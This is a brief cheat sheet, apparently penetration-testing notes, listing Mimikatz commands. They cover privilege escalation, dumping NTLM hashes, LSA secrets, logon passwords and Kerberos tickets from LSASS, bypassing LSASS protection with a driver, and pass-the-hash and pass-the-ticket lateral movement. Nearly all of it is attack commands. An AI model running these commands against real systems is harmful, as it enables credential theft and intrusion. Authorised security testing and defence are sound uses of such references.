Mimikatz is a tool for dumping and using cached credentials on a compromised machine. High integrity or SYSTEM privileges required for most commands.

Usage

Acquiring Privilege

  • privilege::debug (try to enable SeDebugPrivilege; needed for elevation)
  • token::elevate (try to elevate from high integrity to SYSTEM, if not already)

Dumping Credentials

07-credential-access

  • lsadump::sam (dump cached NTLM hashes from LSASS; local users only)
  • lsadump::lsa [ /patch | /inject ] (dump LSA hashes, use patch on a workstation to dump NT hashes and inject on a DC to dump additional keys; patch refers to memory patching, see this article)
  • sekurlsa::logonpasswords (dump all logged on users’ password hash, including remote users’)
    • If LSASS Protection is enabled, install the mimidrv.sys file as a service.
  • sekurlsa::msv (dumps local and domain user cached hashes)
  • kerberos::list /export (dump Kerberos tickets)
  • sekurlsa::tickets /export (dump cached tickets; in the output, “TGT” means ticket-granting ticket, “TGS” means ticket-granting service-ticket)
  • sekurlsa::ekeys (dumps cached encryption keys for Kerberos authentication; debug required)

Using Credentials

09-lateral-movement

  • sekurlsa::pth (pass-the-hash)
    • Format: sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND
    • Run with unelevated privileges (use token::revert). pass-the-hash with an elevated token does not work.
  • kerberos::ptt TICKET.kirbi (inject ticket into memory; elevated privilege not necessary)

Miscellaneous

  • kerberos::purge (get rid of tickets in the current session)